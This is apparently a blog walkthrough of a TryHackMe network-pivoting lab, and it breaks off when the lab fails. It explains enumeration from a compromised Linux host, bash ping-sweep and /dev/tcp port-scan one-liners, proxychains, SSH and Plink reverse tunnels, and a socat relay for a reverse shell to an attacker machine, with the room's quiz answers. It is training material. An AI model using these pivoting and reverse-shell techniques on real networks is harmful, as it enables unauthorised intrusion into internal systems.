Welcome back! In Part 1 we were able to gain a foothold on a system primarily the front end webserver within Thomas Wreaths network.

What did we collect along the way?

L00T

• SSH Key for Root
• Verified the Config for Root SSH access
• Identified the Webservices running on the front end System
• Connected as Root using SSH and with RCE (used Metasploit in this case)

The start of this task introduces us to Pivoting, or as the task says “Pivoting is the art of using access obtained over one machine to exploit another machine deeper in the network“

Why is this important? When attacking a network you are looking to work your way through the layers of security to get access to systems that have not been configured for public access. To give you a scenario where pivoting was essential, there was a router that supplied gateway services for a portion of a customer network. The device was showing as down and unsurprisingly the services were also unable to function. I was remote and needed a way to troubleshoot and return the service back to operation. So out came the network topology and I started following the lines. As luck would have it, there was a connection between this device and another. I checked if the interface was active from network device internally, and it was. So I connected to the Other network device over SSH, and then pivoted to the network device, which had a downed interface. Turned out there had been some maintenance, and the 3rd party performing the activity had not only taken down the wrong interface, but they were stuck on the outside. All verified by change management tickets and approvers 🙂

Interestingly the task does mention that the “Preferred” System to use in this case is a Linux based target… good thing the server compromised is running on CentOS huh!

Questions :-

Which type of pivoting creates a channel through which information can be sent hidden inside another protocol?

• Tunneling

Research: Not covered in this Network, but good to know about. Which Metasploit Framework Meterpreter command can be used to create a port forward?

• portfwd

Enumeration

As part of the enumeration task we look at ways to enumerate a network from our compromised host.

Essentially we have a list which defines living off the land techniques and deploying custom built payloads. LoL (Living off the Land) is an effective way to avoid detection. Primarily this is because you are using tools that are not new. A hardened system may not allow for something custom, however AppLocker or SELinux or AppArmor are going to allow an application to run if you define that you still can. Equally these controls can be circumvented with the right privileged access. Not going into Principle of least privilege now, but that’s where I want to go next.

Some good resources for investigating this further are :-

• https://gtfobins.github.io/
• https://lolbas-project.github.io/
• https://www.loldrivers.io/

My Lab 🙂

Back to the task in hand!

The room recommends investigating the local system for loot, so we will do that now!

First Lets connect back to the system

Now lets collect some Loot!

cat /etc/hosts	127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4 ::1 localhost localhost.localdomain localhost6 localhost6.localdomain6
cat /etc/resolv.conf	Generated by NetworkManager search eu-west-1.compute.internal nameserver 10.200.0.2
arp -a	p-10-200-85-1.eu-west-1.compute.internal (10.200.85.1) at 02:16:e7:43:1c:11 [ether] on eth0 ip-10-200-85-150.eu-west-1.compute.internal (10.200.85.150) at 02:2e:33:62:1c:49 [ether] on eth0
nmcli dev show	GENERAL.DEVICE: eth0 GENERAL.TYPE: ethernet GENERAL.HWADDR: 02:21:15:F6:72:D3 GENERAL.MTU: 9001 GENERAL.STATE: 100 (connected) GENERAL.CONNECTION: eth0 GENERAL.CON-PATH: /org/freedesktop/NetworkManager/ActiveConnection/1 WIRED-PROPERTIES.CARRIER: on IP4.ADDRESS[1]: 10.200.85.200/24 IP4.GATEWAY: 10.200.85.1 IP4.ROUTE[1]: dst = 0.0.0.0/0, nh = 10.200.85.1, mt = 100 IP4.ROUTE[2]: dst = 10.200.85.0/24, nh = 0.0.0.0, mt = 100 IP4.DNS[1]: 10.200.0.2 IP4.DOMAIN[1]: eu-west-1.compute.internal IP6.ADDRESS[1]: fe80::21:15ff:fef6:72d3/64 IP6.GATEWAY: — IP6.ROUTE[1]: dst = ff00::/8, nh = ::, mt = 256, table=255 IP6.ROUTE[2]: dst = fe80::/64, nh = ::, mt = 256 GENERAL.DEVICE: lo GENERAL.TYPE: loopback GENERAL.HWADDR: 00:00:00:00:00:00 GENERAL.MTU: 65536 GENERAL.STATE: 10 (unmanaged) GENERAL.CONNECTION: — GENERAL.CON-PATH: — IP4.ADDRESS[1]: 127.0.0.1/8 IP4.GATEWAY: — IP6.ADDRESS[1]: ::1/128 IP6.GATEWAY: — IP6.ROUTE[1]: dst = ::1/128, nh = ::, mt = 256

The task provides this bash one-liner

for i in {1..255}; do (ping -c 1 192.168.1.${i} | grep "bytes from" &); done

Essentially the command is iterating through the numbers 1 to 255, each iteration we are increasing the number and this replaces the ${i} variable. We are then looking to Grep the output for the phrase “bytes from”.

The task also provides this one liner to perform a similar task, but to scan ports instead

for i in {1..65535}; do (echo > /dev/tcp/192.168.1.1/$i) >/dev/null 2>&1 && echo $i is open; done

Questions:-

What is the absolute path to the file containing DNS entries on Linux?

• /etc/resolv.conf
• This file contains the IP address of DNS Servers to query when attempting to resolve a hostname.

What is the absolute path to the hosts file on Windows?

• C:\Windows\System32\drivers\etc\hosts
• The local static file for hostname resolution, used before DNS servers.

How could you see which IP addresses are active and allow ICMP echo requests on the 172.16.0.x/24 network using Bash?

• for i in {1..255}; do (ping -c 1 172.16.0.${i} | grep “bytes from” &); done

Proxychains and Foxyproxy

What is a Proxy?

In my experience Foxyproxy is a browser plugin and Proxychains is CLI based. A proxy server acts as a connecting point between networks (typically internal network and the internet, but this is not the only use case).

The difference between the two is that Foxyproxy will proxy browser based traffic, and Proxychains can be used for other applications, such as running netcat across the proxy, or nmap.

Doing some research Proxychains supports

• SOCKS4
• SOCKS5
• http
• RAW

Foxyproxy supports

• HTTP
• HTTPS
• SOCKS4
• SOCKS5
• TOR
• Psiphon
• Privoxy
• PAC
• DIRECT

Doing some Research

Knowing what the proxy is able to do, we can now look at the configurations for both Proxychains and Foxyproxy.

The room gives us some information about how to configure Proxy chains and tells us the order in which it will read the configuration files. I believe this is to define order of precedence.

1. The current directory (i.e. ./proxychains.conf)
2. ~/.proxychains/proxychains.conf
3. /etc/proxychains.conf

Try Hack Me

Foxyproxy,is configured from the plugin in firefox

Questions :-

What line would you put in your proxychains config file to redirect through a socks4 proxy on 127.0.0.1:4242?

• socks4 127.0.0.1 4242

What command would you use to telnet through a proxy to 172.16.0.100:23?

• proxychains telnet 172.16.0.100 23

You have discovered a webapp running on a target inside an isolated network. Which tool is more apt for proxying to a webapp: Proxychains (PC) or FoxyProxy (FP)?

• FP

SSH Tunnelling/Port Forwarding

Forwarding and proxying connections is described in the task.

Forward Connections (Attacker to Target)

A forward connection whether direct port forwarding or proxying from the local system uses the attacking system as the first connection for whatever it is being done. There is a difference between the two though which I’ll describe.

• Port Forwarding
  • Essentially this is tying a localport to a specific service on the target e.g. I could tie the port 5555 locally to <ip>:<port>. This means if I access localhost:5555 I would be FORWARDED to <ip>:<port>
  • Example ssh -L 5555:172.16.0.2:80 user@172.16.0.1 -fN
• Proxying
  • I can set a local port which when accessed will send traffic to the target system. The target will then relay the request.
  • Example ssh -D 6666 user@172.16.0.1 -fN

Reverse Connections (Target to Attacker, for Attacker access)

A reverse connection relies on the Target system making a connection back to the Attacker system.

The task recommends using an ephemeral or temporary key for this. Essentially this means that the key is configured specifically to protect the attacker machine and is only used for the reverse connection.

To do this ssh-keygen is used. This is to create the key pair (Private and Public key)

It is described how to set restrictions against the use of the key from the attacking system. Essentially when the key pair is used, the restrictions described in the command below are applied :-

command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-x11-forwarding,no-pty <KEY CONTENT> 

Once this is done check for the status of SSH, basically make sure it is running 🙂

• no-agent-forwarding
  • This disables SSH agent forwarding for the key. SSH agent forwarding allows a user to connect to one server and then use SSH keys stored on that server to authenticate to another server. Essentially you prevent the user who logs in with this key from forwarding their SSH connections.
• no-x11-forwarding
  • X11 forwarding allows users to run GUI applications on the remote server and have them displayed on the local machine. So in this case we would block the ability to forward such traffic while using this key. Which is good because you don’t want the target access the attack machine.
• no-pty
  • A PTY is a terminal emulates a text based terminal access. Disabling PTY means that the target with this key won’t be able to start an interactive shell session on the attack box. I noted that this doesn’t block commands being sent though, well worth keeping in mind!

With this method the private key is moved to the target box… to be fair how is the reverse connection going to work otherwise over ssh?

Now here is the interesting part

ssh -R 8000:172.16.0.10:80 kali@172.16.0.20 -i KEYFILE -fN

Lets break this down!

• -R
  • This parameter tells SSH to setup “remote Port forwarding”
• 8000:172.16.0.10:80
  • Traffic coming in on 8000 is relayed to 172.16.0.10:80
• kali@172.16.0.20
  • The user on the attacking system
• -i
  • The Private key to use
• -fN
  • Background the task, and do not execute remote commands.

Questions

If you’re connecting to an SSH server from your attacking machine to create a port forward, would this be a local (L) port forward or a remote (R) port forward?

• L

Which switch combination can be used to background an SSH port forward or tunnel?

• -fN

It’s a good idea to enter our own password on the remote machine to set up a reverse proxy, Aye or Nay?

• Nay

What command would you use to create a pair of throwaway SSH keys for a reverse connection?

• ssh-keygen

If you wanted to set up a reverse portforward from port 22 of a remote machine (172.16.0.100) to port 2222 of your local machine (172.16.0.200), using a keyfile called id_rsa and backgrounding the shell, what command would you use? (Assume your username is “kali”)

• ssh -R 2222:172.16.0.100:22 kali@172.16.0.200 -i id_rsa -fN

What command would you use to set up a forward proxy on port 8000 to user@target.thm, backgrounding the shell?

• ssh -D 8000 user@target.thm -fN

If you had SSH access to a server (172.16.0.50) with a webserver running internally on port 80 (i.e. only accessible to the server itself on 127.0.0.1:80), how would you forward it to port 8000 on your attacking machine? Assume the username is “user”, and background the shell.

• ssh -L 8000:127.0.0.1:80 user@172.16.0.50 -fN

Using Plink (Putty)

The task covers off how to use Plink to set a reverse connection for a Windows based system. Specifically using Plink as an exe to run a reverse shell from. The idea is that the Windows server is not likely running SSH.

After getting Plink to the server the following command could be executed to setup the reverse shell

cmd.exe /c echo y | .\plink.exe -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -N

THM

The task highlights the need for puttygen to convert the keys created by ssh-keygen.

This is a relatively short section, PuTTY is a great tool for creating SSH sessions, Specifically for gaining access over SSH to a target. It in itself, if on the target system could hold loot in the form of saved connections.

To check the registry for these session details

HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions 

Question

What tool can be used to convert OpenSSH keys into PuTTY style keys?

• puttygen

SOCAT

Now we start looking at other tools. Try hack Me does say that SoCAT or Socket CAT may not be on most systems you connect to, which goes against my preference for gaining access. Personally Living off the land is more preferable.

Specifically I remember from some early training using netcat as a way to create a forwarder between systems, essentially relaying information from one system to another using fifo. However with that said, lets see what we learn from this section!

Questions

Which socat option allows you to reuse the same listening port for more than one connection?

• reuseaddr

If your Attacking IP is 172.16.0.200, how would you relay a reverse shell to TCP port 443 on your Attacking Machine using a static copy of socat in the current directory?

Use TCP port 8000 for the server listener, and do not background the process.

• ./socat tcp-l:8000 tcp:172.16.0.200:443

What command would you use to forward TCP port 2222 on a compromised server, to 172.16.0.100:22, using a static copy of socat in the current directory, and backgrounding the process (easy method)?

• ./socat tcp-l:2222,fork,reuseaddr tcp:172.16.0.100:22 &

Bonus Question (Optional): Try to create an encrypted port forward or relay using the OPENSSL options in socat. Task 7 of the shells room may help with this.

• First thoughts https://www.revshells.com/

The Lab DIED!

WILL COMPLETE THE SECTIONS ONCE LAB WORKS AGAIN 🙂